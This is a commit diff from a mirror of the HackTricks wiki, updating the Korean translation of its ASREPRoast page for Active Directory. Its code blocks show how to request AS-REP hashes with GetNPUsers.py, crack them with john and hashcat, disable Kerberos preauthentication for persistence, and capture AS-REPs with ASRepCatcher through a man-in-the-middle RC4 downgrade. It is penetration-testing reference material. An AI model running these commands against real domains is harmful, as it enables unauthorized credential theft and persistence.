mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Translated ['src/windows-hardening/active-directory-methodology/asreproa
This commit is contained in:
		
							parent
							
								
									929343cfde
								
							
						
					
					
						commit
						1cdcf46a52
					
				@ -4,7 +4,7 @@
 | 
				
			|||||||
 | 
					
 | 
				
			||||||
## ASREPRoast
 | 
					## ASREPRoast
 | 
				
			||||||
 | 
					
 | 
				
			||||||
ASREPRoast는 **Kerberos 사전 인증 필수 속성**이 없는 사용자를 악용하는 보안 공격입니다. 본질적으로 이 취약점은 공격자가 사용자의 비밀번호 없이 도메인 컨트롤러(DC)에서 사용자 인증을 요청할 수 있게 합니다. 그러면 DC는 사용자의 비밀번호에서 파생된 키로 암호화된 메시지로 응답하며, 공격자는 이를 오프라인에서 크랙하여 사용자의 비밀번호를 알아내려고 시도할 수 있습니다.
 | 
					ASREPRoast는 **Kerberos 사전 인증 필수 속성**이 없는 사용자를 악용하는 보안 공격입니다. 본질적으로 이 취약점은 공격자가 사용자의 비밀번호 없이 도메인 컨트롤러(DC)에서 사용자 인증을 요청할 수 있게 합니다. 그러면 DC는 사용자의 비밀번호에서 파생된 키로 암호화된 메시지로 응답하며, 공격자는 이를 오프라인에서 크랙하여 사용자의 비밀번호를 발견하려고 시도할 수 있습니다.
 | 
				
			||||||
 | 
					
 | 
				
			||||||
이 공격의 주요 요구 사항은 다음과 같습니다:
 | 
					이 공격의 주요 요구 사항은 다음과 같습니다:
 | 
				
			||||||
 | 
					
 | 
				
			||||||
@ -33,27 +33,27 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
 | 
				
			|||||||
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
 | 
					Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
> [!WARNING]
 | 
					> [!WARNING]
 | 
				
			||||||
> AS-REP 로스팅을 Rubeus로 수행하면 4768이 생성되며, 암호화 유형은 0x17이고 사전 인증 유형은 0입니다.
 | 
					> AS-REP Roasting with Rubeus는 0x17의 암호화 유형과 0의 사전 인증 유형을 가진 4768을 생성합니다.
 | 
				
			||||||
 | 
					
 | 
				
			||||||
### 크래킹
 | 
					### 크래킹
 | 
				
			||||||
```bash
 | 
					```bash
 | 
				
			||||||
john --wordlist=passwords_kerb.txt hashes.asreproast
 | 
					john --wordlist=passwords_kerb.txt hashes.asreproast
 | 
				
			||||||
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 | 
					hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
### 지속성
 | 
					### Persistence
 | 
				
			||||||
 | 
					
 | 
				
			||||||
**GenericAll** 권한(또는 속성을 쓸 수 있는 권한)이 있는 사용자에 대해 **preauth**를 강제할 필요가 없습니다:
 | 
					사용자에게 **GenericAll** 권한(또는 속성 쓰기 권한)이 있는 경우 **preauth**가 필요하지 않도록 강제합니다:
 | 
				
			||||||
```bash:Using Windows
 | 
					```bash:Using Windows
 | 
				
			||||||
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
 | 
					Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
 | 
					
 | 
				
			||||||
```bash:Using Linux
 | 
					```bash:Using Linux
 | 
				
			||||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
 | 
					bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
## ASREProast 자격 증명 없이
 | 
					## ASREProast without credentials
 | 
				
			||||||
 | 
					
 | 
				
			||||||
공격자는 중간자 위치를 사용하여 AS-REP 패킷을 캡처할 수 있으며, 이는 Kerberos 사전 인증이 비활성화되지 않은 상태에서도 네트워크를 통과합니다. 따라서 VLAN의 모든 사용자에게 작동합니다.\
 | 
					공격자는 중간자 공격 위치를 사용하여 AS-REP 패킷을 캡처할 수 있으며, 이는 Kerberos 사전 인증이 비활성화되는 것에 의존하지 않고 네트워크를 통과합니다. 따라서 VLAN의 모든 사용자에게 작동합니다.\
 | 
				
			||||||
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher)를 사용하면 이를 수행할 수 있습니다. 또한 이 도구는 Kerberos 협상을 변경하여 클라이언트 워크스테이션이 RC4를 사용하도록 강제합니다.
 | 
					[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) 를 사용하면 가능합니다. 또한, 이 도구는 Kerberos 협상을 변경하여 클라이언트 워크스테이션이 RC4를 사용하도록 강제합니다.
 | 
				
			||||||
```bash
 | 
					```bash
 | 
				
			||||||
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
 | 
					# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
 | 
				
			||||||
ASRepCatcher relay -dc $DC_IP
 | 
					ASRepCatcher relay -dc $DC_IP
 | 
				
			||||||
@ -64,7 +64,7 @@ ASRepCatcher relay -dc $DC_IP --disable-spoofing
 | 
				
			|||||||
# Passive listening of AS-REP packets, no packet alteration
 | 
					# Passive listening of AS-REP packets, no packet alteration
 | 
				
			||||||
ASRepCatcher listen
 | 
					ASRepCatcher listen
 | 
				
			||||||
```
 | 
					```
 | 
				
			||||||
## 참고 문헌
 | 
					## References
 | 
				
			||||||
 | 
					
 | 
				
			||||||
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
 | 
					- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
 | 
				
			||||||
 | 
					
 | 
				
			||||||
 | 
				
			|||||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user